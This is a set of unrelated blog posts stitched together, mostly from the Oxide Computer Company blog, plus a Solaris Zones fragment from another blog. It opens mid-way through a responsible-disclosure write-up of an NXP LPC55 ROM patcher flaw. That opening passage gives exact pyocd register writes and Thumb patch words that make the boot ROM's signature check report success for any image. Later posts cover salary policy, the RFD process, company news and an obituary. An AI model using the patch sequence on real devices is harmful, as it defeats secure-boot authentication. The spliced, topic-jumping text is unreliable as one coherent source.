In addition to returning a status code, the function stores a separate return value in its second argument that must also be checked. This makes the ROM patch longer, but not significantly so. The assembly we need is:

// Two instructions to load kSECURE_TRACKER_VERIFIED = 0x55aacc33U
movw r0, 0xcc33
movt r0, 0x55aa

// store kSECURE_TRACKER_VERIFIED to r1 aka isSignVerified
str r0, [r1]

// Two instructions to load kStatus_SKBOOT_Success = 0x5ac3c35a
movw r0, 0xc35a
movt r0, 0x5ac3

// return
bx lr

If you look at a sample disassembly, there’s a mixture of 16- and 32-bit instructions:

45c: f64c 4033 movw r0, #52275 ; 0xcc33
460: f2c5 50aa movt r0, #21930 ; 0x55aa
464: 6008 str r0, [r1, #0]
466: f24c 305a movw r0, #50010 ; 0xc35a
46a: f6c5 20c3 movt r0, #23235 ; 0x5ac3
46e: 4770 bx lr

Everything must be written in 32-bit words, so the 16-bit instructions either get combined with bytes from another instruction or padded with a nop. The function starts halfway into a word (0x1300a34e), so the patch needs to be padded:

pyocd> disas 0x1300a34c 32
0x1300a34c: 70bd pop {r4, r5, r6, pc}
0x1300a34e: 38b5 push {r3, r4, r5, lr}
0x1300a350: 0446 mov r4, r0
0x1300a352: 0d46 mov r5, r1
0x1300a354: fbf7e0f9 bl #0x13005718
0x1300a358: 0020 movs r0, #0
0x1300a35a: 00f048f9 bl #0x1300a5ee
0x1300a35e: 00b1 cbz r0, #0x1300a362
0x1300a360: 09e0 b #0x1300a376
0x1300a362: 0de0 b #0x1300a380
0x1300a364: 38b5 push {r3, r4, r5, lr}
0x1300a366: 0446 mov r4, r0
0x1300a368: 0d46 mov r5, r1
0x1300a36a: 0020 movs r0, #0

// Turn off the ROM patch
pyocd> write32 0x5003e0f4 0x20000000

// Write address and value 0
pyocd> write32 0x5003e100 0x1300a34c
pyocd> write32 0x5003e0f0 0xf64cbf00

// Write address and value 1
pyocd> write32 0x5003e104 0x1300a350
pyocd> write32 0x5003e0ec 0xf2c54033

// Write address and value 2
pyocd> write32 0x5003e108 0x1300a354
pyocd> write32 0x5003e0e8 0x600850aa

// Write address and value 3
pyocd> write32 0x5003e10c 0x1300a358
pyocd> write32 0x5003e0e4 0x305af24c

// Write address and value 4
pyocd> write32 0x5003e110 0x1300a35c
pyocd> write32 0x5003e0e0 0x20c3f6c5

// Write address and value 5
pyocd> write32 0x5003e114 0x1300a360
pyocd> write32 0x5003e0dc 0xbf004770

// Enable patches 0-5
pyocd> write32 0x5003e0fc 0x3f

// Turn on the ROM patcher and set patches 0-5 to single-word replacement mode.
pyocd> write32 0x5003e0f4 0x3f

// The next 7 instructions are the modifications
pyocd> disas 0x1300a34c 32
0x1300a34c: 00bf nop
0x1300a34e: 4cf63340 movw r0, #0xcc33
0x1300a352: c5f2aa50 movt r0, #0x55aa
0x1300a356: 0860 str r0, [r1]
0x1300a358: 4cf25a30 movw r0, #0xc35a
0x1300a35c: c5f6c320 movt r0, #0x5ac3
0x1300a360: 7047 bx lr
0x1300a362: 00bf nop
0x1300a364: 38b5 push {r3, r4, r5, lr}
0x1300a366: 0446 mov r4, r0
0x1300a368: 0d46 mov r5, r1
0x1300a36a: 0020 movs r0, #0

The authentication method now returns success for any address passed in.
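As a sanity check on the packing above, the six patch words can be reconstructed from the instruction halfwords in the disassembly. This throwaway script is our own, not part of the exploit; it just groups consecutive halfwords pairwise, low halfword first:

```python
# Halfwords of the patch in memory order: a leading nop to pad to the
# word boundary, the replacement instruction sequence, and a trailing nop.
halfwords = [
    0xBF00,          # nop (pad: function starts mid-word)
    0xF64C, 0x4033,  # movw r0, #0xcc33
    0xF2C5, 0x50AA,  # movt r0, #0x55aa
    0x6008,          # str r0, [r1]
    0xF24C, 0x305A,  # movw r0, #0xc35a
    0xF6C5, 0x20C3,  # movt r0, #0x5ac3
    0x4770,          # bx lr
    0xBF00,          # nop (pad to fill the last word)
]

# Pack each consecutive pair little-endian: low halfword first.
words = [
    halfwords[i] | (halfwords[i + 1] << 16)
    for i in range(0, len(halfwords), 2)
]
```

The resulting words match the six values written to the 0xf0/0xec/0xe8/0xe4/0xe0/0xdc value slots above.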

The careful observer will note that the FLASH_VerifyProgram and skboot_authenticate patches use the same address slots and thus cannot be applied at the same time. We’re limited to eight 32-bit word changes or a total of 32 bytes which limits the number of locations that can be changed. The assembly demonstrated here is not optimized and could certainly be improved. Another approach is to apply one patch, wait for the function to be called and then switch to a different patch.

Applying Mitigations

A full mitigation would provide a lock-out option so that once the ROM patcher is enabled no further changes are available until the next reset. Based on discussions with NXP, this is not a feature that is available on the current hardware.

The LPC55 offers a standard memory protection unit (MPU). The MPU works on an allowed list of memory regions. If the MPU is configured without the ROM patcher in the allowed set, any access will trigger a fault. This makes it possible to prevent applications from using the ROM patcher at all.

The LPC55 also has a secure AHB bus matrix to provide another layer of protection. This is custom hardware to block access on both the secure and privilege axes. Like the ROM patcher itself, the ability to block access to the ROM patcher is not documented even though it exists. The base address of the ROM patcher (0x5003e000) comes right after the last entry in the APB table (the PLU at 0x5003d000). The order of the bits in the secure AHB registers corresponds to the order of blocks in the memory map, which means the bits corresponding to the ROM patcher come right after the PLU. SEC_CTRL_APB_BRIDGE1_MEM_CTRL3 is the register of interest, and the bits to set for the ROM patcher are 24 and 25.
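Since the register layout follows the memory map, the mask for the ROM patcher's rule can be computed directly. This snippet is illustrative only (the constant names are ours, derived from our reading of the bit positions above):

```python
# The ROM patcher sits one APB slot after the PLU, so its access rule
# in SEC_CTRL_APB_BRIDGE1_MEM_CTRL3 occupies bits 24 and 25.
ROM_PATCH_RULE_SHIFT = 24
ROM_PATCH_RULE_MASK = 0b11 << ROM_PATCH_RULE_SHIFT

# Mask covering exactly bits 24 and 25.
assert ROM_PATCH_RULE_MASK == 0x0300_0000
```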

NXP offers a family of products based on the LPC55 line. The LPC55S2x is notable for not including TrustZone-M. While at first glance this may seem to imply immunity to privilege escalation via ROM patches, the LPC55S2x is still an ARMv8-M device with privileged/non-privileged modes, and it is just as vulnerable. The non-secure MPU is the only method of blocking non-privileged access to the ROM patcher on all LPC55 variants.


Nobody expects code to be perfect. Code for the mask ROM in particular may have to be completed well before other code given manufacturing requirements. Several of the ROM patches on the LPC55 were related to power settings, which may not be finalized until very late in the product cycle. Features to fix bugs must not introduce vulnerabilities, however! The LPC55S69 is marketed as a security product, which makes the availability of the ROM patcher even riskier. The biggest takeaway from all of this is that transparency is important for security. A risk cannot be mitigated unless it is known. Had we not begun to ask deep questions about the ROM’s behavior, we would have been exposed to this vulnerability until it was eventually discovered and reported. Attempts to provide security through obscurity, such as preventing read access to ROMs or leaving hardware undocumented, have been repeatedly shown to be ineffective (https://blog.zapb.de/stm32f1-exceptional-failure/, http://dmitry.gr/index.php?r=05.Projects&proj=23. PSoC4) and merely prolong the exposure. Had NXP documented the ROM patch hardware block and provided ROM source code for auditing, the user community could have found this issue much earlier and without extensive reverse engineering effort.

NXP, however, does not agree; this is their position on the matter (which they have authorized us to share publicly):

Even though we are not believers of security-by-obscurity, keeping the interest of our wide customer base the product specific ROM code is not opened to external parties, except to NXP approved Common Criteria certified security test labs for vulnerability reviews.

At Oxide, we believe fervently in open firmware, at all layers of the stack. In this regard, we intend to be the model for what we wish to see in the world: by the time our Oxide racks are commercially available next year, you can expect that all of the software and firmware that we have written will be open source, available for view – and scrutiny! – by all. Moreover, we know that the arc of system software bends towards open source: we look forward to the day that NXP – and others in the industry who cling to their proprietary software as a means of security – join us with truly open firmware.



Oxide sends disclosure to NXP including an embargo of 90 days


NXP PSIRT acknowledges disclosure


Oxide requests confirmation that the vulnerability was able to be reproduced


NXP confirms vulnerability and is working on mitigation


Oxide requests an update on disclosure timeline


NXP requests clarification of vulnerability scope


Oxide provides responses and a more complete PoC


NXP requests 45 day embargo extension to April 30th, 2021


Oxide publicly discloses this vulnerability as CVE-2021-31532

Compensation as a Reflection of Values Oxide Computer Company Blog

Compensation: the word alone is enough to trigger a fight-or-flight reaction in many. But we in technology have the good fortune of being in a well-compensated domain, so why does this issue induce such anxiety when our basic needs are clearly covered? If it needs to be said, it’s because compensation isn’t merely about the currency we redeem in exchange for our labors, but rather it is a proxy for how we are valued in a larger organization. This, in turn, brings us to our largest possible questions for ourselves, around things like meaning and self-worth.

So when we started Oxide – as in any new endeavor – compensation was an issue we had to deal with directly. First, there was the thorny issue of how we founders would compensate ourselves. Then, of course, came the team we wished to hire: hybrid local and remote, largely experienced to start (on account of Oxide’s outrageously ambitious mission), and coming from a diverse set of backgrounds and experiences. How would we pay people in different geographies? How could we responsibly recruit experienced folks, many of whom have families and other financial obligations that can’t be addressed with stock options? How could we avoid bringing people’s compensation history – often a reflection of race, gender, class, and other factors rather than capability – with them?

We decided to do something outlandishly simple: take the salary that Steve, Jess, and I were going to pay ourselves, and pay that to everyone. The three of us live in the San Francisco Bay Area, and Steve and I each have three kids; we knew that the dollar figure that would allow us to live without financial distress – which we put at $175,000 a year – would be at least universally adequate for the team we wanted to build. And we mean everyone literally: as of this writing we have 23 employees, and that’s what we all make.

Now, because compensation is the hottest of all hot buttons, it can be fairly expected that many people will have a reaction to this. Assuming you’ve made it to this sentence it means you are not already lighting us up in your local comments section (thank you!), and I want to promise in return that we know some likely objections, and we’ll address those. But before we do, we want to talk about the benefits of transparent uniform compensation, because they are, in a word, profound.

Broadly, our compensation model embodies our mission, principles, and values. First and foremost, we believe that our compensation model reflects our principles of honesty, integrity, and decency. To flip it around: sadly, we have seen extant comp structures in the industry become breeding grounds for dishonesty, deceit, and indecency. Beyond our principles, our comp model is a tangible expression of several of our values in particular:

  • It has set the tone with respect to teamwork. In my experience, the need to "quantify" one’s performance to justify changes to individual compensation is at the root of much of what’s wrong in the tech industry. Instead of incentivizing people to achieve together as a team, they are incentivized to advance themselves – usually with sophisticated-sounding jargon like OKRs or MBOs, or perhaps reasonable-sounding (but ultimately misguided) mantras like "measure everything." Even at their very best, these individual incentives represent a drag on a team, as their infrequent calibration can prevent a team from a necessary change in its direction. And at worst, they leave individuals perversely incentivized and operating in direct opposition to the team’s best interest. When comp is taken out of the picture, everyone can just focus on what we need to focus on: getting this outlandish thing built, and loving and serving the customers who are taking a chance on it.

  • It is an expression of our empathy. Our approach to compensation reflects our belief in treating other people the way that we ourselves want to be treated. There are several different dimensions for this, but one is particularly visceral: because we have not talked about this publicly, candidates who have applied to Oxide have done so assuming that we have a traditional comp model, and have braced themselves for the combat of a salary negotiation. But we have spoken about it relatively upfront with candidates (before they talk to the team, for example), and (as the one who has often had this discussion) the relief is often palpable. As one recent candidate phrased it to me: "if I had known about this earlier, I wouldn’t have wasted time stressing out about it!"

  • It is (obviously?) proof-positive of our transparency. Transparency is essential for building trust, itself one of the most important elements of doing something bold together. One of the interesting pieces of advice we got early on from someone who has had outsized, repeated success: modulo private personnel meetings, make sure that every meeting is open to everyone. For those accustomed to more opaque environments, our level of transparency can be refreshing: for example, new Oxide employees have been pleasantly surprised that we always go through our board decks with everyone – but we can’t imagine doing it any other way. Transparent compensation takes this to an unusual (but not unprecedented) extreme, and we have found it to underscore how seriously we take transparency in general.

  • It has allowed whole new levels of candor. When everyone can talk about their salary, other things become easier to discuss directly. This candor is in all directions; without comp to worry about, we can all be candid with respect to our own struggles – which in turn allows us to address them directly. And we can be candid too when giving public positive feedback; we don’t need to be afraid that by calling attention to someone’s progress, someone else will feel shorted.

These are (some of!) the overwhelming positives; what about those objections?

  • Some will say that this salary is too low. While cash compensation gets exaggerated all of the time, it’s unquestionable that salaries in our privileged domain have gotten much higher than our $175,000 (and indeed, many at Oxide have taken a cut in pay to work here). But it’s also true that $175,000 per year puts us each in the top 5% of US individual earners – and it certainly puts a roof over our families' heads and food in their bellies. Put more viscerally: this is enough to not fret when your kids toss the organic raspberries into the shopping cart – or when they devour them before you’ve managed to get the grocery bags out of the car! And speaking of those families: nothing is more anxiety-producing than having a healthcare issue compounded by financial distress due to inadequate insurance; Oxide not only offers the best healthcare plans we could find, but we also pay 100% of monthly premiums – a significant benefit for those with dependents.

  • Some will say that we should be paying people differently based on different geographical locations. I know there are thoughtful people who pay folks differently based on their zip code, but (respectfully), we disagree with this approach. Companies spin this by explaining they are merely paying people based on their cost of living, but this is absurd: do we increase someone’s salary when their spouse loses their job or when their kid goes to college? Do we slash it when they inherit money from their deceased parent or move in with someone? The answer to all of these is no, of course not: we pay people based on their work, not their costs. The truth is that companies pay people less in other geographies for a simple reason: because they can. We at Oxide just don’t agree with this; we pay people the same regardless of where they pick up their mail.

  • Some will say that this doesn’t scale. This is, at some level, surely correct: it’s hard to envision a multi-thousand employee Oxide where everyone makes the same salary – but it has also been (rightly) said that startups should do things that don’t scale. And while it seems true that the uniformity won’t necessarily scale, we believe that the values behind it very much will!

  • Some will say that this makes us unlikely to hire folks just starting out in their career. There is truth to this too, but the nature of our problem at Oxide (namely, technically very broad and very deep), the size of our team (very small), and the stage of our company (still pretty early!) already means that engineers at the earliest stages of their career are unlikely to be a fit for us right now. That said, we don’t think this is impossible; and if we felt that we had someone much earlier in their career who was a fit – that is, if we saw them contributing to the company as much as anyone else – why wouldn’t we reflect that by paying them the same as everyone else?

  • Some will say that this narrows the kind of roles that we can hire for. In particular, different roles can have very different comp models (sales often has a significant commission component in exchange for a lower base, for example). There is truth to this too – but for the moment we’re going to put this in the "but-this-can’t-scale" bucket.

  • Some will say that this doesn’t offer a career ladder. Uniform compensation causes us to ask some deeper questions: namely, what is a career ladder, anyway? To me, the true objective for all of us should be to always be taking on new challenges – to be unafraid to learn and develop. I have found traditional ladders to not serve these ends particularly well, because they focus us on competition rather than collaboration. By eliminating the rung of compensation, we can put the focus on career development where it belongs: on supporting one another in our self-improvement, and working together to do things that are beyond any one of us.

  • Some will say that we should be talking about equity, not cash compensation. While it’s true that startup equity is important, it’s also true that startup equity doesn’t pay the orthodontist’s bill or get the basement repainted. We believe that every employee should have equity to give them a stake in the company’s future (and that an outsized return for investors should also be an outsized return for employees), but we also believe that the presence of equity can’t be used as an excuse for unsustainably low cash compensation. As for how equity is determined, it really deserves its own in-depth treatment, but in short, equity compensates for risk – and in a startup, risk reduces over time: the first employee takes much more risk than the hundredth.

Of these objections, several are of the ilk that this cannot endure at arbitrary scale. This may be true – our compensation may well not be uniform in perpetuity – but we believe wholeheartedly that our values will endure. So if and when the uniformity of our compensation needs to change, we fully expect that it will remain transparent – and that we as a team will discuss it candidly and empathetically. In this regard, we take inspiration from companies that have pioneered transparent compensation. It is very interesting to, for example, look at how Buffer’s compensation has changed over the years. Their approach is different from ours in the specifics, but they are a kindred spirit with respect to underlying values – and their success with transparent compensation gives us confidence that, whatever changes must come with time, we will be able to accommodate them without sacrificing what is important to us!

Finally, a modest correction. The $175,000 isn’t quite true – or at least not anymore. I had forgotten that when we did our initial planning, we had budgeted modest comp increases after the first year, so it turns out, we all got a raise to $180,250 in December! I didn’t know it was coming (and nor did anyone else); Steve just announced it in the All Hands: no three-hundred-and-sixty degree reviews, no stack ranking, no OKRs, no skip-levels, no numerical grades – just a few more organic raspberries in everyone’s shopping basket. Never has a change in compensation felt so universally positive!

UPDATE: Since originally writing this blog entry in 2021, we have increased our salary to $191,227.

RFD 1 Requests for Discussion Oxide Computer Company Blog

One of the first things we did in setting up the company was create a repo named “rfd.” This repo houses our requests for discussion. Bryan teased this to the internet…

…and folks asked for our process, so we are going to share it!

The best way to describe RFDs is with “RFD 1 Requests for Discussion.” Below is that RFD.

Writing down ideas is important: it allows them to be rigorously formulated (even while nascent), candidly discussed and transparently shared. We capture the written expression of an idea in a Request for Discussion (RFD), a document in the original spirit of the IETF Request for Comments, as expressed by RFC 3:

The content of a note may be any thought, suggestion, etc. related to the software or other aspect of the network. Notes are encouraged to be timely rather than polished. Philosophical positions without examples or other specifics, specific suggestions or implementation techniques without introductory or background explication, and explicit questions without any attempted answers are all acceptable. The minimum length for a note is one sentence.

These standards (or lack of them) are stated explicitly for two reasons. First, there is a tendency to view a written statement as ipso facto authoritative, and we hope to promote the exchange and discussion of considerably less than authoritative ideas. Second, there is a natural hesitancy to publish something unpolished, and we hope to ease this inhibition.

Similar to RFCs, our philosophy of RFDs is to allow timely discussion of rough ideas while still serving as a permanent repository for more established ones. Depending on their state, RFDs may be quickly iterated on in a branch, discussed actively as part of a pull request to be merged, or commented upon after having been published. The workflow for the RFD process is based upon those of the Golang proposal process, Joyent RFD process, Rust RFC process, and Kubernetes proposal process.

When to use an RFD

The following are examples of when an RFD is appropriate; the list is intended to be broad:

  • Add or change a company process

  • An architectural or design decision for hardware or software

  • Change to an API or command-line tool used by customers

  • Change to an internal API or tool

  • Change to an internal process

  • A design for testing

RFDs apply not only to technical ideas but to overall company ideas and processes as well. If you have an idea to improve the way something is being done as a company, you have the power to make your voice heard by adding to the discussion.

RFD Metadata and State

At the start of every RFD document, we’d like to include a brief amount of metadata. The metadata format is based on the python-markdown2 metadata format. It’d look like:

authors: Andy Smith <andy@example.computer>, Neal Jones <neal@example.computer>
state: prediscussion

We keep track of three pieces of metadata:

  1. authors: the authors (and therefore owners) of an RFD. They should be listed with their name and e-mail address.

  2. state: must be one of the states discussed below.

  3. discussion: for RFDs that are in or beyond the discussion state, this should be a link to the PR to integrate the RFD; see below for details.
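Because the metadata sits in plain text at the top of the document, it is easy to query mechanically. As a minimal sketch (the README contents below are a stand-in following the format shown above), the state field can be pulled out with a one-liner:

```shell
# Sketch: extract the `state` field from an RFD's metadata block.
# The README created here is a stand-in matching the example format.
cat > README.md <<'EOF'
authors: Andy Smith <andy@example.computer>, Neal Jones <neal@example.computer>
state: prediscussion
EOF
awk -F': ' '/^state:/ { print $2; exit }' README.md
```

This prints `prediscussion`; the same pattern works for the authors and discussion fields.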

An RFD can be in one of the following six states:

  1. prediscussion

  2. ideation

  3. discussion

  4. published

  5. committed

  6. abandoned

A document in the prediscussion state indicates that the work is not yet ready for discussion, but that the RFD is effectively a placeholder. The prediscussion state signifies that the RFD is being rapidly iterated on in its branch in order to advance it to the discussion state.

A document in the ideation state contains only a description of the topic that the RFD will cover, providing an indication of the scope of the eventual RFD. Unlike the prediscussion state, there is no expectation that it is undergoing active revision. Such a document can be viewed as a scratchpad for related ideas. Any member of the team is encouraged to start active development of such an RFD (moving it to the prediscussion state) with or without the participation of the original author. It is critical that RFDs in the ideation state are clear and narrowly defined.

Documents under active discussion should be in the discussion state. At this point, the RFD is being actively discussed in a pull request.

Once (or if) discussion has converged and the Pull Request is ready to be merged, it should be updated to the published state before merge. Note that just because something is in the published state does not mean that it cannot be updated and corrected. See the Making changes to an RFD section for more information.

The prediscussion state should be viewed as essentially a collaborative extension of an engineer’s notebook, and the discussion state should be used when an idea is being actively discussed. These states shouldn’t be used for ideas that have been committed to, organizationally or otherwise; by the time an idea represents the consensus or direction, it should be in the published state.

Once an idea has been entirely implemented, it should be in the committed state. Comments on ideas in the committed state should generally be raised as issues — but if the comment represents a call for a significant divergence from or extension to committed functionality, a new RFD may be called for; as in all things, use your best judgment.

Finally, if an idea is found to be non-viable (that is, deliberately never implemented), or if an RFD should otherwise be flagged as one to ignore, it can be moved into the abandoned state.

We will go over this in more detail below. Let's walk through the life of an RFD.

RFD life-cycle

There is a prototype script in this repository, scripts/new.sh, that will automate the process.

              $ scripts/new.sh 0042 "My title here"

If you wish to create a new RFD by hand, or understand the process in greater detail, read on.


At no time during the process do you push directly to the master branch. Only once the pull request (PR) containing your RFD branch is merged into master will the RFD appear in the master branch.

Reserve a RFD number

You will first need to reserve the number you wish to use for your RFD. This should be the next available RFD number based on the current git branch -r output.
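One way to sketch that lookup: filter branch names down to the 4-digit RFD branches, take the highest, and add one. (This example builds a throwaway repo with local branches so it is self-contained; against the real rfd repo you would pipe `git branch -r` into the same filter.)

```shell
# Sketch: find the next free RFD number from branch names.
# A throwaway repo stands in for the real rfd repo here.
tmp=$(mktemp -d) && cd "$tmp"
git init -q .
git -c user.name=rfd -c user.email=rfd@example.computer \
    commit -q --allow-empty -m init
git branch 0041
git branch 0042
# Keep only branches named as 4-digit numbers, take the highest.
last=$(git branch --format='%(refname:short)' | grep -E '^[0-9]{4}$' | sort -n | tail -1)
# 10# forces base-10 so the leading zeros aren't read as octal.
printf '%04d\n' $((10#$last + 1))
```

With branches 0041 and 0042 present, this prints 0043.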

Create a branch for your RFD

Now you will need to create a new git branch, named after the RFD number you wish to reserve. This number should have leading zeros if less than 4 digits. Before creating the branch, verify that it does not already exist:

              $ git branch -rl "*0042"

If you see a branch there (but not a corresponding sub-directory in rfd in master), it is possible that the RFD is currently being created; stop and check with co-workers before proceeding! Once you have verified that the branch doesn’t exist, create it locally and switch to it:

              $ git checkout -b 0042

Create a placeholder RFD

Now create a placeholder RFD. You can do so with the following commands:

              $ mkdir -p rfd/0042
$ cp prototypes/prototype.md rfd/0042/README.md

Or if you prefer asciidoc

              $ cp prototypes/prototype.adoc rfd/0042/README.adoc

Fill in the RFD number and title placeholders in the new doc and add your name as an author. The status of the RFD at this point should be prediscussion.

If your preference is to use asciidoc, that is acceptable as well, however the examples in this flow will assume markdown.

Push your RFD branch remotely

Push your changes to your RFD branch in the RFD repo.

              $ git add rfd/0042/README.md
$ git commit -m '0042: Adding placeholder for RFD <Title>'
$ git push origin 0042

After your branch is pushed, the table in the README on the master branch will update automatically with the new RFD. The table also updates whenever the RFD's name or state changes. Until the RFD is merged, the single source of truth for information about it is the RFD in its branch.

Iterate on your RFD in your branch

Now, you can work on writing your RFD in your branch.

              $ git checkout 0042

Now you can gather your thoughts and get your RFD to a state where you would like to get feedback and discuss it with others. It's recommended to push your branch remotely regularly so that your changes stay in sync with the remote, in case your local copy is lost or damaged.

It is up to you as to whether you would like to squash all your commits down to one before opening up for feedback, or if you would like to keep the commit history for the sake of history.

Discuss your RFD

When you are ready to get feedback on your RFD, make sure all your local changes are pushed to the remote branch. At this point you are likely at the stage where you will want to change the status of the RFD from prediscussion to discussion for a fully formed RFD, or to ideation for one where only the topic is specified. Do this in your branch.

Push your RFD branch remotely

Along with your RFD content, update the RFD’s state to discussion in your branch, then:

              $ git commit -am '0042: Add RFD for <Title>'
$ git push origin 0042

Open a Pull Request

Open a pull request on GitHub to merge your branch (in this case, 0042) into the master branch.

If you move your RFD into discussion but fail to open a pull request, a friendly bot will do it for you. If you open a pull request but fail to update the state of the RFD to discussion, the bot will automatically correct the state by moving it into discussion. The bot will also clean up the title of the pull request to be RFD {num} {title}, and will automatically add the link to the pull request to the discussion: metadata.

After the pull request is opened, anyone subscribed to the repo will get a notification that you have opened a pull request and can read your RFD and give any feedback.

Discuss the RFD on the pull request

The comments you choose to accept from the discussion are up to you as the owner of the RFD, but you should remain empathetic in the way you engage in the discussion.

For those giving feedback on the pull request, be sure that all feedback is constructive. Put yourself in the other person’s shoes and if the comment you are about to make is not something you would want someone commenting on an RFD of yours, then do not make the comment.

Merge the Pull Request

After there has been time for folks to leave comments, the RFD can be merged into master and changed from the discussion state to the published state. The timing is left to your discretion: you decide when to open the pull request, and you decide when to merge it. As a guideline, 3-5 business days for comments on your RFD before merging seems reasonable — but circumstances (e.g., time zones, availability of particular expertise, length of RFD) may dictate a different timeline, and you should use your best judgment. In general, RFDs shouldn’t be merged if no one else has read or commented on them; if no one is reading your RFD, it’s time to explicitly ask someone to give it a read!

Discussion can continue on published RFDs! The discussion: link in the metadata should be retained, allowing discussion to continue on the original pull request. If an issue merits more attention or a larger discussion of its own, an issue may be opened, with the synopsis directing the discussion.

Any discussion on a published RFD can still be held on the original pull request to keep the sprawl to a minimum. Or, if you feel your post-merge comment requires a larger discussion, an issue may be opened on it — but be sure to reflect the focus of the discussion in the issue synopsis (e.g., “RFD 42: add consideration of RISC-V”), and be sure to link back to the original PR in the issue description so that one may find one from the other.

Making changes to an RFD

After your RFD has been merged, there is always the opportunity to make changes. The easiest way to change an RFD is to make a pull request with the change you would like to make. If you are not the original author of the RFD, name your branch after the RFD number (e.g., 0001) and be sure to @-mention the original authors on your pull request to make sure they see and approve of the changes.

Changes to an RFD will go through the same discussion and merge process as described above.

Committing to an RFD

Once an RFD has been implemented — that is, once it is not an idea of some future state but rather an explanation of how a system works — its state should be moved to committed. This state is essentially no different from published, but represents ideas that have been more fully developed. While discussion on committed RFDs is permitted (and changes allowed), it would be expected to be infrequent.

Changing the RFD process

The best part about the RFD process is that it itself is expressed in this RFD; if you want to change the process itself, you can apply the RFD process to its own RFD: chime in on the discussion link or open an issue as dictated by its current state!



Because RFDs are so core to everything we do, we automatically update a CSV file in the repo listing all the RFDs along with their state, links, and other information, for easy parsing. We then have functions in Rust that let us easily fetch this information and build tooling around RFD data.
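A machine-readable CSV makes ad-hoc queries easy even without the Rust tooling. For instance (the file and its column layout below are a made-up stand-in, not the actual repo format), listing every published RFD:

```shell
# Sketch: list published RFDs from an auto-generated CSV.
# The file and columns here are hypothetical stand-ins.
cat > rfd.csv <<'EOF'
num,title,state
1,Requests for Discussion,published
42,Another Idea,discussion
EOF
# Skip the header row, match on the state column.
awk -F, 'NR > 1 && $3 == "published" { print $1, $2 }' rfd.csv
```

This prints `1 Requests for Discussion`.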

Short URLs

As you can imagine, keeping track of RFDs and their links becomes unwieldy at scale. To help, we have short URLs. You can link to any RFD on GitHub with {num}.rfd.oxide.computer — for example, 12.rfd.oxide.computer. The path form also works: rfd.oxide.computer/12, if that is preferred.

Any discussion for an RFD can be linked with {num}.rfd.oxide.computer/discussion.

These short URLs get automatically updated when a new RFD is opened.

Chat bot

In chat you can use !rfd {any text} | {rfd number} to return information about that RFD. For example, !rfd 1 returns the links to RFD 1, its discussion (if it is in discussion), and information about its state. Remembering the number for an RFD is often hard, so any string you pass to the bot will be fuzzy-matched across RFD titles. !rfd user api will return the RFD whose title matches the text. In this example, it is RFD 4.

Shared RFD Rendered Site

As a way to share certain RFDs with other parties like potential customers, partners, and friends of the company, we have created a website that renders the RFD markdown or asciidoc into HTML in a nice format. This is a nice way to get feedback without adding everyone to the repo (as well as nicely formatting the content).

And that’s a wrap! Hopefully, this is helpful if you ever think about doing the same type of process internally!

March 2020 Update Oxide Computer Company Blog

Hello friends!

I want to start by saying we wish you the very best during this unprecedented time in which we are all united. Our thoughts go out to everyone working hard to help those in need. We wish you and your families health and resilience.

Hard at work…​ and growing

A lot has happened at Oxide since we first de-cloaked in December and I apologize for the lack of an official update on our end, other than our Twitter feeds. We’ve been hard at work building a product!

We are now a team of 15 people! Everyone was in Emeryville for the Open Compute Summit, which was cancelled, but we still made the best of it by having company-wide face-to-face architecture discussions. We even snapped a photo with the whole team. As Bryan said: we cannot wait for this image to be burned into a ROM.

Figure 1. Team

Computer History Museum

We also made sure to visit the Computer History Museum while everyone was in town. It was fun to have some folks from the open firmware community join us as well! Since it was not busy, we got to spend an unusually long amount of time with the docent at the IBM 1401 demo, which was fascinating.

computer history museum
Figure 2. Computer history museum

On the Metal

Last month, we wrapped up the first season of our podcast, On the Metal. These were super fun to record and I know we are looking forward to Season 2 just as much as you are!


On February 18th, we received the most perfect PCI vendor ID: 01DE. Huge thanks to Robert Mustacchi for getting that!

The Soul of a New Machine at Stanford

Bryan gave a talk at Stanford on The Soul of a New Machine.

In the media

Tom Krazit at Protocol published a feature on what we are working on: This little server startup wants to take on a horde of tech giants.

Moving in

Cliff L. Biffle made us new signs for our conference rooms!

office signs

We have gotten some amazing mugs from folks for our collection, thank you all so much!

The phone lines are now open!

Last Monday, I opened our phone line to anyone who wanted to share stories about their hardware pain. Thank you to everyone for the wonderful conversations!

oxide.computer v2

On Wednesday, Jared Volpe shipped the redesign of this website! Pro tip: check out the 404 page ;)

Bryan at Oxidize 1K

On Friday, Bryan gave a talk at Oxidize 1K on "Tockilator: Deducing Tock execution flow from Ibex Verilator traces".

We will update this post once the video becomes available! For a good synopsis of the conference check out this post.

Stay tuned!

That’s all for now. We will continue to update you with news as we go about building.

RIP Khaled Bichara, 1971-2020 Oxide Computer Company Blog

We were deeply saddened to learn that Khaled Bichara, one of Oxide’s angel investors, died in a car accident in Cairo on Friday night.

Those of us who have known Khaled for years have known him to be a bold investor who appreciated hard technical problems – and also a profoundly decent person, who cared deeply for his family, his companies, and his country. Khaled’s stories of kindling entrepreneurship in Egypt were inspiring to any who heard them – and served as a reminder of the responsibility that we all have to our broader communities. Our most recent conversation with Khaled – just a few short months ago – remains vivid: he was excited by our technical vision and thrilled to be a part of Oxide. For our part, we were looking forward to a long journey together, and to making good on his belief in us; we are gutted to have lost him so abruptly. Our hearts go out to his family, and to all those whom he touched over his career; Silicon Valley may be a long way from Cairo, but his impact and legacy will be felt here for years to come.

Oxide Computer Company: Initial boot sequence Oxide Computer Company Blog

We have started a computer company! If you haven’t yet, read Jess’s account of us being born in a garage and Bryan’s on the soul of our new computer company. Also, see the perspectives of some of our founding engineers: Robert Mustacchi on joining Oxide, Joshua Clulow on the need for a new machine, and Patrick Mooney on everything he sees aligning at Oxide (and in particular, on the importance of Oxide’s principles!).

If it needs to be said, starting a computer company is an ambitious endeavor; we are thrilled to have investment led by Eclipse Ventures and joined by an incredible group of institutional and angel investors. Our investors see what we see: the potential to integrate hardware and software together to bring hyperscaler-class infrastructure to everyone.

To use the machine as metaphor, Oxide is at the earliest stages of boot: the power is on, and the first instructions have been executed – but we have a long way to go before we’re fully operational! If you are interested in following our progress sign up for our mailing list. If you are interested in potentially joining us, check out our careers page. And if nothing else, give a listen to our podcast, On the Metal!

Zones, way back when The Trouble with Tribbles...

The original big ticket feature in Solaris 10 was Zones, a simple virtualization technology that allowed a set of processes to be put aside in a separate namespace and be under the illusion that this was a separate computer system, all under a single shared kernel.

As a result of this sleight of hand, you could connect to a zone using ssh (or, remember this was way back, telnet or rsh), and from the application level you really were in a separate system - with your own file system and network namespaces. It was like magic.

Of the features in Solaris 10, Zones and DTrace were present early in the beta cycle, while SMF just made it into the last couple of beta builds, and ZFS wasn't actually available to customers until well after the first Solaris 10 release.

